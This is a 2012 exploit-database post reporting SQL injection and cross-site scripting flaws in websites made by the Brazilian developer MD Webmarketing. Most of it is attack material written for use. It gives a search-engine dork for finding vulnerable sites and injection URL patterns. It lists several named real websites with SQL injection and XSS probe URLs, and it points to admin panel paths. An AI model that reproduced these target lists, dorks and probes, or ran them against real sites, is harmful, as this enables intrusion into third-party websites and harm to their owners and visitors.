Home / exploits

PDF

MD Webmarketing Cross Site Scripting / SQL Injection

Posted on 07 November 2012

###############################################################################################################
# Exploit Title : MD-WEBMARKETING - SQL Injection/Cross Site Scripting Vulnerabilities
# Date : 06-11-2012
# Author : Caleb Bucker (Independent Security Researcher)
# Contact : https://twitter.com/CalebDrugs
# Website : www.calebbucker.blogspot.com
# Vendor : MD Webmarketing
# URL Vendor : http://mdwebmarketing.com.br/
# Category : WebApps
# Dork : "Desenvolvido por: MD-WEBMARKETING" inurl:.php?id=
# Tested on: : BackTrack 5 R3
###############################################################################################################

###############################################################################################################

[~] Exploit:

http://www.site-web.com/***.php?id= [SQL Injection]

http://www.site-web.com/***.php?id=**********&busca= [Cross Site Scripting]

###############################################################################################################

[~] Example Sites SQL Injection:

http://www.acontecenews.com.br/exibe.php?id=65637'
http://www.revistapenseleve.com.br/exibe.php?id=1331'
http://itaporaagora.com.br/exibe.php?id=133050'
http://www.pierreadrileiloes.com.br/exibe.php?id=61712'
http://www.viaruralagro.com.br/loja/detalhes.php?id=24'

###############################################################################################################

[~] Example Sites Cross Site Scripting:

http://www.acontecenews.com.br/exibe.php?id=62587&cod_editorial=&url=index.php&pag=&busca="<h2>TEST</h2>
http://www.itaporaagora.com.br/exibe.php?id=132094&cod_editorial=&url=exibe.php&pag=&busca="<h2>TEST</h2>
http://www.deodapolisagora.com.br/exibe.php?id=131746&cod_editorial=&url=&pag=&busca="<h2>TEST</h2>

###############################################################################################################

[~] Screenshot:

http://imageshack.us/a/img443/2181/testwwh.png [SQL Injection]
http://imageshack.us/a/img687/7656/test2sc.png [Cross Site Scripting]

###############################################################################################################

[~] Location Panel Administrative:

http://www.site-web.com/adm
http://www.site-web.com/admin

###############################################################################################################

# Greet'z | @Pwnakil | @CLsecurity2011 & All my friend

# 1337day.com [2012-11-06]

 

TOP